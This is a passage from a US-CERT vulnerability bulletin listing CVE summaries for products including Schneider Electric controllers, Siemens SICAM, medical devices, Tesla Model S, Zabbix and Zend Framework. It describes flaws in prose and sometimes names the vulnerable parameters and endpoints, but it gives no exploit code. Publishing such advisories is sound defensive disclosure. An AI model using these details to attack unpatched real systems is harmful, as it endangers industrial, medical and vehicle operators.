An issue was discovered in OSIsoft PI Coresight 2016 R2 and earlier versions, and PI Web API 2016 R2 when deployed using the PI AF Services 2016 R2 integrated install kit. An information exposure through server log files vulnerability has been identified, which may allow service account passwords to become exposed for the affected services, potentially leading to unauthorized shutdown of the affected PI services as well as potential reuse of domain credentials. 2017-02-13 not yet calculated CVE-2017-5153
BID
MISC
osisoft — pi_web
 
An issue was discovered in OSIsoft PI Web API 2015 R2 (Version 1.5.1). There is a weakness in this product that may allow an attacker to access the PI system without the proper permissions. 2017-02-13 not yet calculated CVE-2016-8353
BID
MISC
perl — pcre
 
The compile_bracket_matchingpath function in pcre_jit_compile.c in PCRE through 8.x before revision 1680 (e.g., the PHP 7.1.1 bundled version) allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted regular expression. 2017-02-16 not yet calculated CVE-2017-6004
CONFIRM
CONFIRM
perl — perl
 
The DBD::mysql module before 4.039 for Perl, when using server-side prepared statement support, allows attackers to cause a denial of service (out-of-bounds read) via vectors involving an unaligned number of placeholders in WHERE condition and output fields in SELECT expression. 2017-02-16 not yet calculated CVE-2016-1249
CONFIRM
MLIST
BID
CONFIRM
phoenix_contact — mguard
 
An issue was discovered on Phoenix Contact mGuard devices that have been updated to Version 8.4.0. When updating an mGuard device to Version 8.4.0 via the update-upload facility, the update will succeed, but it will reset the password of the admin user to its default value. 2017-02-13 not yet calculated CVE-2017-5159
BID
MISC
phreesoft — phreebookserp
 
An issue was discovered in PhreeBooksERP before 2017-02-13. The vulnerability exists due to insufficient filtration of user-supplied data in the "form" HTTP GET parameter passed to the "PhreeBooksERP-master/extensions/ShippingMethods/ups/label_mgr/js_include.php" and "PhreeBooksERP-master/extensions/ShippingMethods/yrc/label_mgr/js_include.php" URLs. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. NOTE: these js_include.php files do not exist in the SourceForge "stable release" (aka R37RC1). 2017-02-15 not yet calculated CVE-2017-5990
CONFIRM
CONFIRM
pkexec — pkexec
 
pkexec, when used with --user nonpriv, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer. 2017-02-13 not yet calculated CVE-2016-2568
MLIST
CONFIRM
puppet_enterprise — mcollective
 
MCollective 2.7.0 and 2.8.x before 2.8.9, as used in Puppet Enterprise, allows remote attackers to execute arbitrary code via vectors related to the mco ping command. 2017-02-13 not yet calculated CVE-2016-2788
CONFIRM
puppet_enterprise — puppet_communications_protocol The Puppet Communications Protocol in Puppet Enterprise 2015.3.x before 2015.3.3 does not properly validate certificates for the broker node, which allows remote non-whitelisted hosts to prevent runs from triggering via unspecified vectors. 2017-02-13 not yet calculated CVE-2016-2787
CONFIRM
python — pycrypto Heap-based buffer overflow in the ALGnew function in block_template.c in Python Cryptography Toolkit (aka pycrypto) allows remote attackers to execute arbitrary code, as demonstrated by a crafted iv parameter to cryptmsg.py. 2017-02-15 not yet calculated CVE-2013-7459
MLIST
BID
CONFIRM
CONFIRM
CONFIRM
FEDORA
FEDORA
MISC
python — python install.py in click allows remote attackers to gain privileges via a data tarball containing a file with a crafted path. 2017-02-13 not yet calculated CVE-2015-8768
UBUNTU
MLIST
CONFIRM
CONFIRM
rockwell_automation — logix5000 An issue was discovered in Rockwell Automation Logix5000 Programmable Automation Controller FRN 16.00 through 21.00 (excluding all firmware versions prior to FRN 16.00, which are not affected). By sending a malformed Common Industrial Protocol (CIP) packet, an attacker may be able to overflow a stack-based buffer and execute code on the controller or initiate a nonrecoverable fault, resulting in a denial of service. 2017-02-13 not yet calculated CVE-2016-9343
BID
MISC
rockwell_automation — micrologix An issue was discovered in Rockwell Automation Allen-Bradley MicroLogix 1100 controller 1763-L16AWA, Series A and B, Version 14.000 and prior versions; 1763-L16BBB, Series A and B, Version 14.000 and prior versions; 1763-L16BWA, Series A and B, Version 14.000 and prior versions; and 1763-L16DWD, Series A and B, Version 14.000 and prior versions. Because of an incorrect permission assignment for a critical resource, users with administrator privileges may be able to remove all administrative users, requiring a factory reset to restore ancillary web server function. Exploitation of this vulnerability will still allow the affected device to function in its capacity as a controller. 2017-02-13 not yet calculated CVE-2016-9338
BID
MISC
rockwell_automation — micrologix An issue was discovered in Rockwell Automation Allen-Bradley MicroLogix 1100 controller 1763-L16AWA, Series A and B, Version 14.000 and prior versions; 1763-L16BBB, Series A and B, Version 14.000 and prior versions; 1763-L16BWA, Series A and B, Version 14.000 and prior versions; and 1763-L16DWD, Series A and B, Version 14.000 and prior versions. User credentials are sent to the web server in clear text, which may allow an attacker to discover the credentials if they are able to observe traffic between the web browser and the server. 2017-02-13 not yet calculated CVE-2016-9334
BID
MISC
sap — sap The SAP Message Server HTTP daemon in SAP KERNEL 7.21-7.49 allows remote attackers to cause a denial of service (memory consumption and process crash) via multiple msgserver/group?group= requests with a crafted size of the group parameter, aka SAP Security Note 2358972. 2017-02-15 not yet calculated CVE-2017-5997
MISC
sauter — novaweb An issue was discovered in Sauter NovaWeb web HMI. The application uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user. 2017-02-13 not yet calculated CVE-2016-10224
MISC
schneider_electric — connexium_firewalls An issue was discovered in Schneider Electric ConneXium firewalls TCSEFEC23F3F20 all versions, TCSEFEC23F3F21 all versions, TCSEFEC23FCF20 all versions, TCSEFEC23FCF21 all versions, and TCSEFEC2CF3F20 all versions. A stack-based buffer overflow can be triggered during the SNMP login authentication process that may allow an attacker to remotely execute code. 2017-02-13 not yet calculated CVE-2016-8352
BID
MISC
schneider_electric — ionxxxx An issue was discovered on Schneider Electric IONXXXX series power meters ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, and PM5XXX series. No authentication is configured by default. An unauthorized user can access the device management portal and make configuration changes. 2017-02-13 not yet calculated CVE-2016-5815
BID
MISC
schneider_electric — ionxxxx An issue was discovered on Schneider Electric IONXXXX series power meters ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, and PM5XXX series. There is no CSRF token generated to authenticate the user during a session. Successful exploitation of this vulnerability can allow unauthorized configuration changes to be made and saved. 2017-02-13 not yet calculated CVE-2016-5809
BID
MISC
schneider_electric — magelis An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker may be able to disrupt a targeted web server, resulting in a denial of service because of uncontrolled resource consumption. 2017-02-13 not yet calculated CVE-2016-8374
BID
MISC
schneider_electric — magelis An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker can open multiple connections to a targeted web server and keep them open, preventing new connections from being made and rendering the web server unavailable during an attack. 2017-02-13 not yet calculated CVE-2016-8367
BID
MISC
schneider_electric — unity_pro An issue was discovered in Schneider Electric Unity PRO prior to V11.1. Unity projects can be compiled as x86 instructions and loaded onto the PLC Simulator delivered with Unity PRO. These x86 instructions are subsequently executed directly by the simulator. A specially crafted patched Unity project file can make the simulator execute malicious code by redirecting the control flow of these instructions. 2017-02-13 not yet calculated CVE-2016-8354
BID
MISC
schneider_electric — wonderware_historian An issue was discovered in Schneider Electric Wonderware Historian 2014 R2 SP1 P01 and earlier. Wonderware Historian creates logins with default passwords, which can allow a malicious entity to compromise Historian databases. In some installation scenarios, resources beyond those created by Wonderware Historian may be compromised as well. 2017-02-13 not yet calculated CVE-2017-5155
BID
MISC
shadow — shadow Integer overflow in shadow 4.2.1 allows local users to gain privileges via crafted input to newuidmap. 2017-02-17 not yet calculated CVE-2016-6252
MLIST
MLIST
MLIST
MLIST
CONFIRM
CONFIRM
sielco_sistemi — sielco_sistemi An issue was discovered in Sielco Sistemi Winlog Lite SCADA Software, versions prior to Version 3.02.01, and Winlog Pro SCADA Software, versions prior to Version 3.02.01. An uncontrolled search path element (DLL hijacking) vulnerability has been identified. Exploitation of this vulnerability could give an attacker access to the system with the same level of privilege as the application that utilizes the malicious DLL. 2017-02-13 not yet calculated CVE-2017-5161
BID
MISC
siemens — eta4 An issue was discovered in Siemens ETA4 firmware (all versions prior to Revision 08) of the SM-2558 extension module for SICAM AK, SICAM TM 1703, SICAM BC 1703, and SICAM AK 3. Specially crafted packets sent to Port 2404/TCP could cause the affected device to go into defect mode; a cold start might be required to recover the system (a denial-of-service vulnerability). 2017-02-13 not yet calculated CVE-2016-7987
BID
MISC
siemens — sicam_pas An issue was discovered in Siemens SICAM PAS before 8.00. A factory account with hard-coded passwords is present in the SICAM PAS installations. Attackers might gain privileged access to the database over Port 2638/TCP. 2017-02-13 not yet calculated CVE-2016-8567
BID
MISC
siemens — sicam_pas An issue was discovered in Siemens SICAM PAS before 8.00. Because passwords are stored in a recoverable format, an authenticated local attacker with certain privileges could possibly reconstruct the passwords of users for accessing the database. 2017-02-13 not yet calculated CVE-2016-8566
BID
MISC
simplesamlphp — simplesamlphp The validateSignature method in the SAML2\Utils class in SimpleSAMLphp before 1.14.10 and simplesamlphp/saml2 library before 1.9.1, 1.10.x before 1.10.3, and 2.x before 2.3.3 allows remote attackers to spoof SAML responses or possibly cause a denial of service (memory consumption) by leveraging improper conversion of return values to boolean. 2017-02-16 not yet calculated CVE-2016-9814
BID
CONFIRM
simplesamlphp — simplesamlphp The SimpleSAML_XML_Validator class constructor in SimpleSAMLphp before 1.14.11 might allow remote attackers to spoof signatures on SAML 1 responses or possibly cause a denial of service (memory consumption) by leveraging improper conversion of return values to boolean. 2017-02-16 not yet calculated CVE-2016-9955
BID
CONFIRM
smiths-medical — cadd-solis_medication_safety_software An issue was discovered in Smiths-Medical CADD-Solis Medication Safety Software, Version 1.0; 2.0; 3.0; and 3.1. CADD-Solis Medication Safety Software grants an authenticated user elevated privileges on the SQL database, which would allow an authenticated user to modify drug libraries, add and delete users, and change user permissions. According to Smiths-Medical, physical access to the pump is required to install drug library updates. 2017-02-13 not yet calculated CVE-2016-8355
BID
MISC
smiths-medical — cadd-solis_medication_safety_software An issue was discovered in Smiths-Medical CADD-Solis Medication Safety Software, Version 1.0; 2.0; 3.0; and 3.1. The affected software does not verify the identities at communication endpoints, which may allow a man-in-the-middle attacker to gain access to the communication channel between endpoints. 2017-02-13 not yet calculated CVE-2016-8358
BID
MISC
sogo — sogo Multiple cross-site scripting (XSS) vulnerabilities in the Web Calendar in SOGo before 2.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) title of an appointment or (2) contact fields. 2017-02-17 not yet calculated CVE-2014-9905
MLIST
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
sogo — sogo Multiple cross-site scripting (XSS) vulnerabilities in the View Raw Source page in the Web Calendar in SOGo before 3.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) Description, (2) Location, (3) URL, or (4) Title field. 2017-02-17 not yet calculated CVE-2016-6191
MLIST
CONFIRM
CONFIRM
sogo — sogo SOGo before 2.3.12 and 3.x before 3.1.1 does not restrict access to the UID and DTSTAMP attributes, which allows remote authenticated users to obtain sensitive information about appointments with the "View the Date & Time" restriction, as demonstrated by correlating UIDs and DTSTAMPs between all users. 2017-02-17 not yet calculated CVE-2016-6190
MLIST
CONFIRM
CONFIRM
CONFIRM
sogo — sogo Incomplete blacklist in SOGo before 2.3.12 and 3.x before 3.1.1 allows remote authenticated users to obtain sensitive information by reading the fields in the (1) ics or (2) XML calendar feeds. 2017-02-17 not yet calculated CVE-2016-6189
MLIST
CONFIRM
CONFIRM
CONFIRM
st_jude_medical — merlin@home An issue was discovered in St. Jude Medical Merlin@home, versions prior to Version 8.2.2 (RF models: EX1150; Inductive models: EX1100; and Inductive models: EX1100 with MerlinOnDemand capability). The identities of the endpoints for the communication channel between the transmitter and St. Jude Medical’s web site, Merlin.net, are not verified. This may allow a man-in-the-middle attacker to access or influence communications between the identified endpoints. 2017-02-13 not yet calculated CVE-2017-5149
BID
MISC
tesla — model_s An issue was discovered in Tesla Motors Model S automobile, all firmware versions before version 7.1 (2.36.31) with web browser functionality enabled. The vehicle’s Gateway ECU is susceptible to commands that may allow an attacker to install malicious software, allowing the attacker to send messages to the vehicle’s CAN bus (a command injection). 2017-02-13 not yet calculated CVE-2016-9337
BID
MISC
tre_library_musl_libc — tre_library_musl_libc Multiple integer overflows in the TRE library and musl libc allow attackers to cause memory corruption via a large number of (1) states or (2) tags, which triggers an out-of-bounds write. 2017-02-13 not yet calculated CVE-2016-8859
MLIST
MLIST
BID
unix — intersect_alliance_snare_epilog Cross-site scripting (XSS) vulnerability in InterSect Alliance SNARE Epilog for UNIX version 1.5 allows remote authenticated users to inject arbitrary web script or HTML via the str_log_name parameter in a "Web Admin Portal > Log Configuration > Add" action. 2017-02-17 not yet calculated CVE-2017-5998
MISC
visonic — powerlink2 An issue was discovered in Visonic PowerLink2, all versions prior to October 2016 firmware release. When a specific URL to an image is accessed, the downloaded image carries with it source code used in the web server (information exposure). 2017-02-13 not yet calculated CVE-2016-5813
BID
MISC
wago — wago An issue was discovered in WAGO 750-8202/PFC200 prior to FW04 (released August 2015), WAGO 750-881 prior to FW09 (released August 2016), and WAGO 0758-0874-0000-0111. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to edit and to view settings without authenticating. 2017-02-13 not yet calculated CVE-2016-9362
BID
MISC
wso2 — wso2_identity_server Cross-site request forgery (CSRF) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 allows remote attackers to hijack the authentication of privileged users for requests that process XACML requests via an entitlement/eval-policy-submit.jsp request. 2017-02-16 not yet calculated CVE-2016-4311
MISC
MISC
BUGTRAQ
BID
EXPLOIT-DB
wso2 — wso2_identity_server XML external entity (XXE) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 before WSO2-CARBON-PATCH-4.4.0-0231 allows remote authenticated users with access to XACML features to read arbitrary files, cause a denial of service, conduct server-side request forgery (SSRF) attacks, or have unspecified other impact via a crafted XACML request to entitlement/eval-policy-submit.jsp. NOTE: this issue can be combined with CVE-2016-4311 to exploit the vulnerability without credentials. 2017-02-16 not yet calculated CVE-2016-4312
MISC
MISC
BUGTRAQ
BID
CONFIRM
EXPLOIT-DB
xen — xen The (1) ioport_read and (2) ioport_write functions in Xen, when qemu is used as a device model within Xen, might allow local x86 HVM guest OS administrators to gain qemu process privileges via vectors involving an out-of-range ioport access. 2017-02-16 not yet calculated CVE-2016-9637
BID
SECTRACK
CONFIRM
CONFIRM
zabbix — zabbix SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php. 2017-02-16 not yet calculated CVE-2016-10134
MLIST
MLIST
BID
CONFIRM
CONFIRM
zend_framework — zend_framework The (1) order and (2) group methods in Zend_Db_Select in the Zend Framework before 1.12.19 might allow remote attackers to conduct SQL injection attacks via vectors related to use of the character pattern [\w]* in a regular expression. 2017-02-16 not yet calculated CVE-2016-6233
BID
CONFIRM
FEDORA
FEDORA
FEDORA
zend_framework — zend_framework The (1) order and (2) group methods in Zend_Db_Select in the Zend Framework before 1.12.20 might allow remote attackers to conduct SQL injection attacks by leveraging failure to remove comments from an SQL statement before validation. 2017-02-16 not yet calculated CVE-2016-4861
JVN
JVNDB
CONFIRM
FEDORA
FEDORA
FEDORA
This product is provided subject to this Notification and this Privacy & Use policy.

Source: US-CERT Bulletins @ February 20, 2017 at 09:16AM